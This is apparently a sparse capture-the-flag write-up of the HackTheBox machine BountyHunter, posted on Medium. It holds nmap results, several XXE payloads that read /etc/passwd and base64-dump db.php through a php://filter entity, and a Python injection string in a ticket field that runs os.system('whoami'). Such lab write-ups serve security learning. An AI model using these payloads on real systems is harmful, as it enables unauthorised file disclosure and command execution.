HackTheBox-BountyHunter

NMAP

PORT   STATE SERVICE REASON         VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Bounty Hunters
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

<!DOCTYPE arz  [Entity] >
<!ENTITY arz SYSTEM "file:///etc/passwd">
<!DOCTYPE test [<!ENTITY arz SYSTEM "file:///etc/passwd"> ]>
<?xml  version="1.0" encoding="ISO-8859-1"?>
<bugreport>
<title>SQLI</title>
<cwe>IDK</cwe>
<cvss>4.4</cvss>
<reward>99</reward>
</bugreport>
<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE test [<!ENTITY arz SYSTEM "file:///etc/passwd"> ]>
<bugreport>
<title>&arz;</title>
<cwe>IDK</cwe>
<cvss>4.4</cvss>
<reward>99</reward>
</bugreport>
<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE replace [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=db.php"> ]>
<bugreport>
<title>&example;</title>
<cwe>IDK</cwe>
<cvss>4.4</cvss>
<reward>99</reward>
</bugreport>
# Skytrain Inc
## Ticket to
__Ticket Code:__
**102**+__import__('os').system('whoami')

References

--

--

--

Pentester | CTF Player

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

The truth about Github Copilot

Reading and Updating the JSON files in AWS S3 from Frontend

Get sublime text instead of gedit in ubuntu

Why is Java so influential

Galaxy Shooter 2D — Enemy Behavior

quick and dirty openCV for the clueless designer

Airflow with no downtime: An in-depth guide

Day 16 — All code is garbage. How to make sure that yours is the right kind of garbage.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ARZ101

ARZ101

Pentester | CTF Player

More from Medium

HackTheBox-BlackField

HackTheBox — Previse

Write up: Backdoor -HTB

HTB: Bastard Writeup w/o Metasploit